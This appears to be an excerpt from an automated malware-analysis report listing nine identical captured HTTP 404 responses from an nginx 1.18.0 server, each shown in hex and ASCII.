                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:56:34 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:56:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:56:58 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:57:02 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:57:08 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:57:11 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:57:15 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:57:35 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:57:39 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
